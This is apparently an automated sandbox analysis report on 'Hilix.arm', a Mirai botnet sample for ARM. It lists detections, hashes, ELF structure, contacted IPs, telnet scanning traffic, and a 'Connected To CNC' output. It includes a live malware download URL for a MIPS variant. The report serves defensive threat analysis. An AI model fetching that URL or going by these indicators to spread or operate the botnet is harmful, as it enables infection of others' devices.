Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd-agent-1
Source: Hilix.arm, 5244.1.0000000029a6c1e5.00000000e024ef6a.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/Hilix.armSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Hilix.arm
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: !/usr/bin/qemu-arm!/proc/5285/fd/11
Source: Hilix.arm, 5244.1.00000000ea87e5a5.000000005c832e06.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: Hilix.arm, 5244.1.0000000029a6c1e5.00000000e024ef6a.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information:

Yara detected Mirai

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	OS Credential Dumping1	Security Software Discovery11	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Hilix.arm	53%	Virustotal		Browse
Hilix.arm	64%	ReversingLabs	Linux.Trojan.Mirai

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:52869/picdesc.xml	0%	Virustotal		Browse
http://127.0.0.1:52869/picdesc.xml	0%	Avira URL Cloud	safe
http://37.0.9.202/bins/Hilix.mips	9%	Virustotal		Browse
http://37.0.9.202/bins/Hilix.mips	100%	Avira URL Cloud	malware
http://127.0.0.1:52869/wanipcn.xml	0%	Virustotal		Browse
http://127.0.0.1:52869/wanipcn.xml	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:52869/picdesc.xml	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://127.0.0.1:52869/wanipcn.xml	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/soap/encoding/	Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	false		high
http://37.0.9.202/bins/Hilix.mips	Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/envelope/	Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.104.67.34	unknown	Egypt	37069	MOBINILEG	false
185.119.218.5	unknown	Czech Republic	198167	APPTOCLOUDAppToCloudserversvpsCZ	false
91.52.65.178	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
45.128.22.52	unknown	Denmark	201290	BLACKGATENL	false
219.56.220.39	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
156.49.160.17	unknown	Sweden	29975	VODACOM-ZA	false
17.30.215.164	unknown	United States	714	APPLE-ENGINEERINGUS	false
156.254.70.171	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false
38.206.46.24	unknown	United States	9009	M247GB	false
91.19.165.50	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
91.75.212.117	unknown	United Arab Emirates	15802	DU-AS1AE	false
91.120.152.33	unknown	Hungary	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
90.70.5.162	unknown	France	3215	FranceTelecom-OrangeFR	false
141.150.163.18	unknown	United States	701	UUNETUS	false
95.156.176.206	unknown	Bosnia and Herzegowina	20875	HPTNET-ASBA	false
185.106.143.34	unknown	Serbia	7979	SERVERS-COMUS	false
38.181.75.64	unknown	United States	174	COGENT-174US	false
91.30.56.29	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
91.54.122.242	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
45.206.28.0	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
59.1.188.143	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
77.110.64.247	unknown	Lebanon	34610	RIKSNETSE	false
45.9.143.74	unknown	Russian Federation	209038	ALEXGEINERMSKRU	false
45.18.215.62	unknown	United States	7018	ATT-INTERNET4US	false
185.75.12.212	unknown	Spain	201942	SOLTIAES	false
91.74.73.94	unknown	United Arab Emirates	15802	DU-AS1AE	false
185.38.220.169	unknown	Poland	56523	AMELEKTRONIKPL	false
185.23.188.242	unknown	France	60532	RENTACLOUDFR	false
45.63.53.230	unknown	United States	20473	AS-CHOOPAUS	false
45.237.157.87	unknown	Brazil	268286	TECHPIGNATONTELECOMBR	false
185.35.202.71	unknown	Norway	50304	BLIXNO	false
185.169.213.42	unknown	Germany	13012	GENIAS-ASDE	false
79.103.170.140	unknown	Greece	1241	FORTHNET-GRForthnetEU	false
176.196.62.156	unknown	Russian Federation	39927	ELIGHT-ASRU	false
194.28.179.238	unknown	Ukraine	197073	KUZNETSOVSK-ASUA	false
45.185.140.128	unknown	Brazil	269378	INFINITETELECOMBR	false
185.149.161.42	unknown	Russian Federation	61131	ZONATELECOM-ASRU	false
142.166.65.28	unknown	Canada	855	CANET-ASN-4CA	false
189.172.103.25	unknown	Mexico	8151	UninetSAdeCVMX	false
59.27.2.25	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
45.50.54.63	unknown	United States	20001	TWC-20001-PACWESTUS	false
185.19.109.133	unknown	United Kingdom	17804	LAODC-AS-APLaoDataCenterLA	false
190.94.7.150	unknown	Dominican Republic	12066	ALTICEDOMINICANASADO	false
41.239.218.36	unknown	Egypt	8452	TE-ASTE-ASEG	false
89.67.99.56	unknown	Poland	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
45.199.228.211	unknown	Seychelles	8100	ASN-QUADRANET-GLOBALUS	false
45.126.216.220	unknown	Hong Kong	23470	RELIABLESITEUS	false
99.56.5.185	unknown	United States	7018	ATT-INTERNET4US	false
197.164.175.168	unknown	Egypt	24863	LINKdotNET-ASEG	false
45.9.143.98	unknown	Russian Federation	209038	ALEXGEINERMSKRU	false
45.52.96.195	unknown	United States	5650	FRONTIER-FRTRUS	false
185.124.199.108	unknown	Germany	3337	KOMATSUDE	false
41.17.0.118	unknown	South Africa	29975	VODACOM-ZA	false
173.70.19.34	unknown	United States	701	UUNETUS	false
185.15.150.55	unknown	Spain	199930	WIFIBALEARES-ASCSabaters13ES	false
45.55.195.228	unknown	United States	14061	DIGITALOCEAN-ASNUS	false
185.187.222.120	unknown	Italy	31543	MYNET-ASmyNETgmbhAT	false
154.82.151.120	unknown	Seychelles	32708	ROOTNETWORKSUS	false
17.112.167.99	unknown	United States	714	APPLE-ENGINEERINGUS	false
2.41.35.61	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
91.13.61.237	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
194.253.157.141	unknown	European Union	1759	TSF-IP-CORETeliaFinlandOyjEU	false
113.51.241.67	unknown	China	17506	UCOMARTERIANetworksCorporationJP	false
173.184.189.173	unknown	United States	7029	WINDSTREAMUS	false
185.192.230.56	unknown	United Kingdom	5503	RMIFLGB	false
156.158.248.174	unknown	Tanzania United Republic of	37133	airtel-tz-asTZ	false
41.45.223.165	unknown	Egypt	8452	TE-ASTE-ASEG	false
36.118.160.38	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false
41.17.127.1	unknown	South Africa	29975	VODACOM-ZA	false
5.218.125.60	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
45.145.30.193	unknown	Turkey	197328	INETLTDTR	false
90.255.143.236	unknown	United Kingdom	5378	VodafoneGB	false
45.1.177.234	unknown	United States	7377	UCSDUS	false
53.82.186.160	unknown	Germany	31399	DAIMLER-ASITIGNGlobalNetworkDE	false
143.10.148.65	unknown	United States	11003	PANDGUS	false
59.218.207.68	unknown	China	2516	KDDIKDDICORPORATIONJP	false
222.202.165.36	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
91.90.138.39	unknown	Israel	25046	CHECKPOINTIL	false
197.173.155.25	unknown	South Africa	37168	CELL-CZA	false
68.97.175.155	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
37.155.189.38	unknown	Turkey	20978	TT_MOBILIstanbulTR	false
45.197.137.128	unknown	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	false
96.151.55.151	unknown	United States	7922	COMCAST-7922US	false
91.74.182.121	unknown	United Arab Emirates	15802	DU-AS1AE	false
91.60.221.230	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
91.235.70.182	unknown	Ukraine	33817	TELEGROUPUA-ASUA	false
91.5.97.3	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
57.159.196.85	unknown	Belgium	2686	ATGS-MMD-ASUS	false
45.18.240.22	unknown	United States	7018	ATT-INTERNET4US	false
41.77.181.171	unknown	Algeria	36974	AFNET-ASCI	false
45.122.192.3	unknown	China	63535	FFANChengduWandaElectronicInformationTechnologyCoLtd	false
91.67.33.158	unknown	Germany	31334	KABELDEUTSCHLAND-ASDE	false
179.77.43.231	unknown	Brazil	26615	TIMSABR	false
173.12.201.233	unknown	United States	7922	COMCAST-7922US	false
45.130.62.123	unknown	Israel	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
185.21.99.54	unknown	Austria	49808	POWERSPEED-ASAT	false
185.70.118.221	unknown	Italy	204482	EPICLINK-ASIT	false
41.80.99.57	unknown	Kenya	33771	SAFARICOM-LIMITEDKE	false
45.242.108.39	unknown	Egypt	24863	LINKdotNET-ASEG	false
91.18.128.111	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false

Runtime Messages

Command:	/tmp/Hilix.arm
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Connected To CNC
Standard Error:

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.63.53.230	NMlnVly7uv	Get hash	malicious	Browse
45.128.22.52	leyw73RE9o	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DTAGInternetserviceprovideroperationsDE	L831wSjET5	Get hash	malicious	Browse	93.254.197.52
	JVHk2b1Yd5	Get hash	malicious	Browse	31.229.195.240
	Hilix.arm7	Get hash	malicious	Browse	91.21.45.255
	Hilix.x86	Get hash	malicious	Browse	91.29.31.23
	dUW6YG1Tdv	Get hash	malicious	Browse	31.237.215.12
	RPov9E0iot	Get hash	malicious	Browse	91.19.190.168
	uohdbohpYb	Get hash	malicious	Browse	91.27.218.9
	oiHTZaiKnI	Get hash	malicious	Browse	62.227.13.104
	7DoAjWX5uZ	Get hash	malicious	Browse	84.140.96.185
	1Y2rsDBP9s	Get hash	malicious	Browse	194.25.81.149
	t7WU0JjLAR	Get hash	malicious	Browse	80.156.66.212
	Yoshi.arm7	Get hash	malicious	Browse	193.159.83.138
	Yoshi.arm	Get hash	malicious	Browse	217.92.199.99
	arm	Get hash	malicious	Browse	31.240.167.60
	arm7-20211101-1513	Get hash	malicious	Browse	84.176.76.151
	mips	Get hash	malicious	Browse	93.222.116.118
	JjHQ8Q1weT	Get hash	malicious	Browse	84.178.181.33
	anWxzNav9N	Get hash	malicious	Browse	87.152.224.174
	mxHkqAIYT0	Get hash	malicious	Browse	79.236.87.239
	Antisocial.x86	Get hash	malicious	Browse	84.136.240.4
MOBINILEG	Hilix.arm7	Get hash	malicious	Browse	45.104.67.35
	WhFNix8BoE	Get hash	malicious	Browse	102.15.76.212
	Hilix.x86	Get hash	malicious	Browse	105.45.177.25
	yVbcX1sEtS	Get hash	malicious	Browse	197.151.240.163
	SZAYTvvY9Y	Get hash	malicious	Browse	154.134.179.153
	BVBf45GBHP	Get hash	malicious	Browse	105.35.52.129
	u4M7XeqKtD	Get hash	malicious	Browse	154.130.49.5
	Yoshi.arm7	Get hash	malicious	Browse	105.37.57.179
	JjHQ8Q1weT	Get hash	malicious	Browse	105.182.204.221
	Antisocial.x86	Get hash	malicious	Browse	45.106.6.116
	Antisocial.arm	Get hash	malicious	Browse	45.104.92.31
	w66OTKGVFv	Get hash	malicious	Browse	45.104.148.77
	swOGb2sZYt	Get hash	malicious	Browse	45.104.148.98
	ydZLm6GD56	Get hash	malicious	Browse	45.111.37.156
	BitmCvTrdO	Get hash	malicious	Browse	45.104.148.75
	UQnO4DB8Z1	Get hash	malicious	Browse	45.99.107.249
	OhUy3woBmb	Get hash	malicious	Browse	45.103.171.147
	yxD7DmfG2j	Get hash	malicious	Browse	41.91.249.173
	x86	Get hash	malicious	Browse	105.180.23.14
	jGVlUAzDbQ	Get hash	malicious	Browse	154.128.84.191
BLACKGATENL	sora.x86	Get hash	malicious	Browse	45.128.22.98
	u9afRawaNV	Get hash	malicious	Browse	45.128.22.99
	x86-20211004-1530	Get hash	malicious	Browse	45.128.22.84
	65FRc9Gooh	Get hash	malicious	Browse	45.128.22.98
	leyw73RE9o	Get hash	malicious	Browse	45.128.22.52

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

/proc/5290/oom_score_adj Download File
Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	6
Entropy (8bit):	1.7924812503605778
Encrypted:	false
SSDEEP:	3:ptn:Dn
MD5:	CBF282CC55ED0792C33D10003D1F760A
SHA1:	007DD8BD75468E6B7ABA4285E9B267202C7EAEED
SHA-256:	FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
SHA-512:	4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
Malicious:	false
Reputation:	high, very likely benign file
Preview:	-1000.

/proc/5405/oom_score_adj Download File
Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	6
Entropy (8bit):	1.7924812503605778
Encrypted:	false
SSDEEP:	3:ptn:Dn
MD5:	CBF282CC55ED0792C33D10003D1F760A
SHA1:	007DD8BD75468E6B7ABA4285E9B267202C7EAEED
SHA-256:	FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
SHA-512:	4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
Malicious:	false
Reputation:	high, very likely benign file
Preview:	-1000.

/proc/5409/oom_score_adj Download File
Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	6
Entropy (8bit):	1.7924812503605778
Encrypted:	false
SSDEEP:	3:ptn:Dn
MD5:	CBF282CC55ED0792C33D10003D1F760A
SHA1:	007DD8BD75468E6B7ABA4285E9B267202C7EAEED
SHA-256:	FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
SHA-512:	4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
Malicious:	false
Reputation:	high, very likely benign file
Preview:	-1000.

/run/sshd.pid Download File
Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:E2v:EI
MD5:	B7E7F61E602E76B7E029FB1017EF47D8
SHA1:	6E59553854D7D99CB393905261B0B22600C3B713
SHA-256:	5A7BB77B731A3ECC715295E4F9ED20A306B64677B40260C2940B368339B7C50C
SHA-512:	65F0C1B62D7305AA7C644803CB310EAFD3195D941A2FBCAF03A9F835E00C795F1A6F111EBEEA44DAC9BCDF10BF11B24F938CA553B23702CB92316E05AFEC33A9
Malicious:	false
Reputation:	low
Preview:	5409.

Static File Info

General
File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy (8bit):	6.095639721571195
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	Hilix.arm
File size:	62456
MD5:	9653f94dca32a23046c21ffeea172dd6
SHA1:	a7037a2353ddf06c10144563b077c906b92ebbfa
SHA256:	dcd35159cd640f9b66aad91d5dc7d1e81fffd2478c1e44e0f3184db70285040f
SHA512:	eee662344819192c92fbc4fd428442c7702055a1f9eaa44edac679ba861d3062bd4297605038e87efa32897be286ce460daca7defcd911e5f225bef917ecdd6e
SSDEEP:	1536:UyW869O3GXz/z8a5OI2s/9M53e53mc0PKwl5p/a+53m:Uyx6EK3wRs/+5ORmhCwl5Ml
File Content Preview:	.ELF...a..........(.........4...h.......4. ...(.....................................................(...............Q.td..................................-...L."....6..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x202
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	62056
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	4
.text	PROGBITS	0x80b0	0xb0	0xdb00	0x0	0x6	AX	16
.fini	PROGBITS	0x15bb0	0xdbb0	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x15bc4	0xdbc4	0x1108	0x0	0x2	A	4
.ctors	PROGBITS	0x1f000	0xf000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x1f008	0xf008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x1f014	0xf014	0x214	0x0	0x3	WA	4
.bss	NOBITS	0x1f228	0xf228	0x2e8	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0xf228	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0xeccc	0xeccc	3.3634	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0xf000	0x1f000	0x1f000	0x228	0x510	1.5752	0x6	RW	0x8000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2021 01:46:13.859097958 CET	54003	23	192.168.2.23	185.76.255.51
Nov 2, 2021 01:46:13.859107018 CET	54003	23	192.168.2.23	130.107.169.55
Nov 2, 2021 01:46:13.859112978 CET	54003	23	192.168.2.23	99.40.204.55
Nov 2, 2021 01:46:13.859118938 CET	54003	23	192.168.2.23	99.249.102.54
Nov 2, 2021 01:46:13.859134912 CET	54003	23	192.168.2.23	198.240.159.175
Nov 2, 2021 01:46:13.859141111 CET	54003	23	192.168.2.23	47.111.154.51
Nov 2, 2021 01:46:13.859157085 CET	54003	23	192.168.2.23	206.190.187.173
Nov 2, 2021 01:46:13.859167099 CET	54003	23	192.168.2.23	207.73.204.91
Nov 2, 2021 01:46:13.859169006 CET	54003	23	192.168.2.23	178.22.94.37
Nov 2, 2021 01:46:13.859167099 CET	54003	23	192.168.2.23	72.89.198.59
Nov 2, 2021 01:46:13.859190941 CET	54003	23	192.168.2.23	87.109.145.122
Nov 2, 2021 01:46:13.859196901 CET	54003	23	192.168.2.23	111.123.168.204
Nov 2, 2021 01:46:13.859206915 CET	54003	23	192.168.2.23	205.158.216.218
Nov 2, 2021 01:46:13.859214067 CET	54003	23	192.168.2.23	90.236.105.87
Nov 2, 2021 01:46:13.859219074 CET	54003	23	192.168.2.23	121.155.110.92
Nov 2, 2021 01:46:13.859220028 CET	54003	23	192.168.2.23	68.17.237.89
Nov 2, 2021 01:46:13.859229088 CET	54003	23	192.168.2.23	90.175.99.196
Nov 2, 2021 01:46:13.861448050 CET	54003	23	192.168.2.23	201.249.219.84
Nov 2, 2021 01:46:13.861463070 CET	54003	23	192.168.2.23	76.153.162.22
Nov 2, 2021 01:46:13.861466885 CET	54003	23	192.168.2.23	144.115.24.118
Nov 2, 2021 01:46:13.861480951 CET	54003	23	192.168.2.23	172.131.131.149
Nov 2, 2021 01:46:13.861495018 CET	54003	23	192.168.2.23	186.227.221.235
Nov 2, 2021 01:46:13.861505985 CET	54003	23	192.168.2.23	211.247.213.135
Nov 2, 2021 01:46:13.861515045 CET	54003	23	192.168.2.23	94.246.130.177
Nov 2, 2021 01:46:13.861516953 CET	54003	23	192.168.2.23	94.87.126.146
Nov 2, 2021 01:46:13.861535072 CET	54003	23	192.168.2.23	136.117.212.181
Nov 2, 2021 01:46:13.861552954 CET	54003	23	192.168.2.23	70.111.187.139
Nov 2, 2021 01:46:13.861552954 CET	54003	23	192.168.2.23	25.151.1.67
Nov 2, 2021 01:46:13.861557961 CET	54003	23	192.168.2.23	101.47.81.22
Nov 2, 2021 01:46:13.861557007 CET	54003	23	192.168.2.23	189.33.223.115
Nov 2, 2021 01:46:13.861566067 CET	54003	23	192.168.2.23	180.20.33.84
Nov 2, 2021 01:46:13.861577034 CET	54003	23	192.168.2.23	101.220.60.178
Nov 2, 2021 01:46:13.861579895 CET	54003	23	192.168.2.23	91.225.175.161
Nov 2, 2021 01:46:13.861586094 CET	54003	23	192.168.2.23	140.121.105.248
Nov 2, 2021 01:46:13.861601114 CET	54003	23	192.168.2.23	179.130.250.23
Nov 2, 2021 01:46:13.861625910 CET	54003	23	192.168.2.23	94.178.137.80
Nov 2, 2021 01:46:13.861701965 CET	54003	23	192.168.2.23	206.79.248.139
Nov 2, 2021 01:46:13.861709118 CET	54003	23	192.168.2.23	192.119.104.193
Nov 2, 2021 01:46:13.861722946 CET	54003	23	192.168.2.23	106.48.18.132
Nov 2, 2021 01:46:13.861723900 CET	54003	23	192.168.2.23	167.67.17.20
Nov 2, 2021 01:46:13.861726999 CET	54003	23	192.168.2.23	119.0.43.124
Nov 2, 2021 01:46:13.861733913 CET	54003	23	192.168.2.23	61.105.100.27
Nov 2, 2021 01:46:13.861737967 CET	54003	23	192.168.2.23	160.169.168.12
Nov 2, 2021 01:46:13.861740112 CET	54003	23	192.168.2.23	208.171.231.169
Nov 2, 2021 01:46:13.861746073 CET	54003	23	192.168.2.23	139.38.50.3
Nov 2, 2021 01:46:13.861747026 CET	54003	23	192.168.2.23	130.49.43.226
Nov 2, 2021 01:46:13.861751080 CET	54003	23	192.168.2.23	97.251.125.56
Nov 2, 2021 01:46:13.861752033 CET	54003	23	192.168.2.23	105.222.81.117
Nov 2, 2021 01:46:13.861753941 CET	54003	23	192.168.2.23	140.213.57.236
Nov 2, 2021 01:46:13.861756086 CET	54003	23	192.168.2.23	35.184.212.252
Nov 2, 2021 01:46:13.861757040 CET	54003	23	192.168.2.23	209.209.33.198
Nov 2, 2021 01:46:13.861757040 CET	54003	23	192.168.2.23	163.92.47.60
Nov 2, 2021 01:46:13.861757994 CET	54003	23	192.168.2.23	58.4.143.65
Nov 2, 2021 01:46:13.861759901 CET	54003	23	192.168.2.23	219.43.5.25
Nov 2, 2021 01:46:13.861763000 CET	54003	23	192.168.2.23	91.186.12.82
Nov 2, 2021 01:46:13.861768007 CET	54003	23	192.168.2.23	88.118.37.126
Nov 2, 2021 01:46:13.861771107 CET	54003	23	192.168.2.23	213.199.221.129
Nov 2, 2021 01:46:13.861773968 CET	54003	23	192.168.2.23	145.151.232.220
Nov 2, 2021 01:46:13.861778975 CET	54003	23	192.168.2.23	213.212.33.102
Nov 2, 2021 01:46:13.861783981 CET	54003	23	192.168.2.23	209.24.83.211
Nov 2, 2021 01:46:13.861787081 CET	54003	23	192.168.2.23	128.174.6.161
Nov 2, 2021 01:46:13.861790895 CET	54003	23	192.168.2.23	95.182.53.120
Nov 2, 2021 01:46:13.861799002 CET	54003	23	192.168.2.23	48.38.156.61
Nov 2, 2021 01:46:13.861803055 CET	54003	23	192.168.2.23	57.190.80.216
Nov 2, 2021 01:46:13.861805916 CET	54003	23	192.168.2.23	59.134.75.131
Nov 2, 2021 01:46:13.861809969 CET	54003	23	192.168.2.23	151.31.37.250
Nov 2, 2021 01:46:13.861813068 CET	54003	23	192.168.2.23	139.110.228.89
Nov 2, 2021 01:46:13.861813068 CET	54003	23	192.168.2.23	121.209.126.44
Nov 2, 2021 01:46:13.861823082 CET	54003	23	192.168.2.23	207.149.39.198
Nov 2, 2021 01:46:13.861823082 CET	54003	23	192.168.2.23	58.47.21.110
Nov 2, 2021 01:46:13.861824036 CET	54003	23	192.168.2.23	42.175.195.243
Nov 2, 2021 01:46:13.861825943 CET	54003	23	192.168.2.23	32.101.37.27
Nov 2, 2021 01:46:13.861835003 CET	54003	23	192.168.2.23	210.236.157.180
Nov 2, 2021 01:46:13.861839056 CET	54003	23	192.168.2.23	75.236.0.41
Nov 2, 2021 01:46:13.861851931 CET	54003	23	192.168.2.23	78.170.178.2
Nov 2, 2021 01:46:13.861855984 CET	54003	23	192.168.2.23	36.225.206.77
Nov 2, 2021 01:46:13.861856937 CET	54003	23	192.168.2.23	63.208.55.241
Nov 2, 2021 01:46:13.861857891 CET	54003	23	192.168.2.23	117.126.116.203
Nov 2, 2021 01:46:13.861864090 CET	54003	23	192.168.2.23	111.157.28.134
Nov 2, 2021 01:46:13.861865997 CET	54003	23	192.168.2.23	166.159.137.250
Nov 2, 2021 01:46:13.861865997 CET	54003	23	192.168.2.23	129.17.142.18
Nov 2, 2021 01:46:13.861867905 CET	54003	23	192.168.2.23	59.2.7.108
Nov 2, 2021 01:46:13.861875057 CET	54003	23	192.168.2.23	102.137.81.138
Nov 2, 2021 01:46:13.861876965 CET	54003	23	192.168.2.23	135.12.183.26
Nov 2, 2021 01:46:13.861879110 CET	54003	23	192.168.2.23	111.162.226.162
Nov 2, 2021 01:46:13.861881018 CET	54003	23	192.168.2.23	65.85.233.47
Nov 2, 2021 01:46:13.861885071 CET	54003	23	192.168.2.23	34.175.4.209
Nov 2, 2021 01:46:13.861887932 CET	54003	23	192.168.2.23	64.171.200.101
Nov 2, 2021 01:46:13.861891031 CET	54003	23	192.168.2.23	108.99.207.111
Nov 2, 2021 01:46:13.861891985 CET	54003	23	192.168.2.23	132.48.52.116
Nov 2, 2021 01:46:13.861893892 CET	54003	23	192.168.2.23	98.141.11.49
Nov 2, 2021 01:46:13.861896992 CET	54003	23	192.168.2.23	179.215.174.41
Nov 2, 2021 01:46:13.861901045 CET	54003	23	192.168.2.23	35.106.47.244
Nov 2, 2021 01:46:13.861903906 CET	54003	23	192.168.2.23	48.164.76.253
Nov 2, 2021 01:46:13.861906052 CET	54003	23	192.168.2.23	71.158.220.250
Nov 2, 2021 01:46:13.861911058 CET	54003	23	192.168.2.23	197.185.39.30
